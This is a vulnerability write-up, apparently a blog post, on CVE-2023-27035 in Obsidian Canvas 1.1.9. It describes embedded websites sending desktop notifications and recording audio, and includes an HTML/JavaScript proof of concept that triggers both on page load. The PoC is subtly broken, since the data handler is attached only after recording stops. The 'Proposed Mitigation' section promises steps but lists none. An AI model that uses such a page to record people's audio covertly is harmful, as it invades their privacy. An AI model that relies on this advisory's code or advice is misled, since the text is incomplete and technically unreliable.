CVE-2023-27035: Obsidian Canvas 1.1.9 Allows Remote Attackers to Send Desktop Notifications, Record User Audio and More through Embedded Websites

---
A serious vulnerability has been discovered in Obsidian Canvas 1.1.9 that potentially exposes users to unauthorized access by remote attackers. This issue, assigned the identifier CVE-2023-27035, could allow attackers to send desktop notifications, record user audio and have other unspecified impacts on the affected system. This post aims to provide a comprehensive analysis of this vulnerability, including a detailed explanation of the issue, affected versions, proof-of-concept code snippets, and proposed mitigations to protect users.

Exploit Details

---
Due to an improperly implemented security feature, Obsidian Canvas 1.1.9 allows remote attackers to exploit the affected system through embedded websites on the canvas page. This could allow attackers to perform actions such as sending desktop notifications, recording user audio, or even performing other activities, which are not explicitly mentioned. The repercussions of this exploit can lead to a violation of user privacy and personal information theft, making this a high-risk vulnerability.

Affected Versions

---
As of now, Obsidian Canvas version 1.1.9 has been confirmed to be affected by this vulnerability. Earlier versions of the software may also be susceptible to this exploit. Users are recommended to upgrade to the latest available version as soon as possible to mitigate the risk.

Code Snippet

---
The code snippet below demonstrates a basic proof-of-concept for this vulnerability. An attacker could create an embedded website with the following HTML and JavaScript code, which will send a desktop notification and record user audio when a user visits the embedded website on the affected Obsidian Canvas:

<!DOCTYPE html>
<html>
  <head>
    <title>CVE-2023-27035 PoC</title>
    <script>
      function sendNotification() {
        if (Notification.permission !== "granted") {
          Notification.requestPermission();
        }
        var notification = new Notification("CVE-2023-27035", {
          body: "You have been exploited!"
        });
      }

      function recordAudio() {
        navigator.mediaDevices
          .getUserMedia({audio: true})
          .then(function(stream) {
            var mediaRecorder = new MediaRecorder(stream);
            mediaRecorder.start();

            setTimeout(function() {
              mediaRecorder.stop();
              mediaRecorder.ondataavailable = function(event) {
                // Attacker can access and transmit the recorded data.
              };
            }, 500);
          });
      }

      window.onload = function() {
        sendNotification();
        recordAudio();
      };
    </script>
  </head>
  <body>
    <h1>CVE-2023-27035 Proof of Concept</h1>
  </body>
</html>

Proposed Mitigation

---
The developers of Obsidian Canvas are currently working on implementing a security fix for this issue. Meanwhile, users can take the following steps to protect themselves:

Conclusion

---
In summary, CVE-2023-27035 is a critical vulnerability discovered in Obsidian Canvas 1.1.9. Remote attackers can exploit this issue to send desktop notifications, record user audio, and perform other unspecified activities through embedded websites in canvas pages. Users should stay vigilant and update their software as soon as the patch is released to avoid potential exploitation.

Timeline

Published on: 05/01/2023 22:15:00 UTC
Last modified on: 05/06/2023 03:14:00 UTC